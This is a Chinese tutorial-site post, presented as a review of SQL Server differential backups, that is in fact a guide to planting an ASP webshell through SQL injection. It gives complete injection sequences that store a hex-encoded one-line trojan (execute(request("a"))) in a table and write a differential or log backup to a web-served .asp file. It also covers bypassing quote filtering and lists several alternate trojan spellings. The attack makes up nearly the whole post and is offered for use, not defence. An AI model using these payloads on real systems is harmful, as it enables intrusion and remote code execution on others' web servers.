复习一下sql server的差异备份

小金金yeah

小金金yeah

2016-02-19 11:47

想不想get新技能酷炫一下,今天图老师小编就跟大家分享个简单的复习一下sql server的差异备份教程,一起来看看吧!超容易上手~
MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少! 

差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:ddd.bak';--

2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:%execute(request("a"))%

如下是网上常见的差异备份代码,思路一样!
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是%execute(request("a"))%
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:webwokao.asp

声明:方法不是我想的,我只是写工具,默认得到shell是
%execute(request("a"))%
===============================================================

我发现上面代码,有时会无效,而直接用

backup database 库名 to disk = 'c:ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的!

库名 必须要有效的库名,一般注入工具都可以得到!如果某站过滤 "‘",就要把字符内容转为数值了!


网上还有log增量备份的,我也把他记录一下
=====================================================
另一种log增量备份技术:

';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:cmd' with init--

';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--

';backup log null to disk = '备份路径'--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马,还可以有这么几种写法:

a).%%25Execute(request("a"))%%25
b).%Execute(request("a"))%
c).%%execute request("a")%%
d).script language=VBScript runat=serverexecute request("a")/script
e).%25Execute(request("a"))%25 
展开更多 50%)
分享

猜你喜欢

复习一下sql server的差异备份

编程语言 网络编程
复习一下sql server的差异备份

Web环境下SQL Server数据备份与恢复

编程语言 网络编程
Web环境下SQL Server数据备份与恢复

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

SQL Server中网络备份一例

编程语言 网络编程
SQL Server中网络备份一例

SQL Server磁带数据备份

SQLServer
SQL Server磁带数据备份

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

Asp备份与恢复SQL Server

ASP
Asp备份与恢复SQL Server

SQL Server与Oracle实施成本上的差异

编程语言 网络编程
SQL Server与Oracle实施成本上的差异

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

QQ系统假消息制作揭秘

QQ系统假消息制作揭秘

sql server中千万数量级分页存储过程代码

sql server中千万数量级分页存储过程代码
下拉加载更多内容 ↓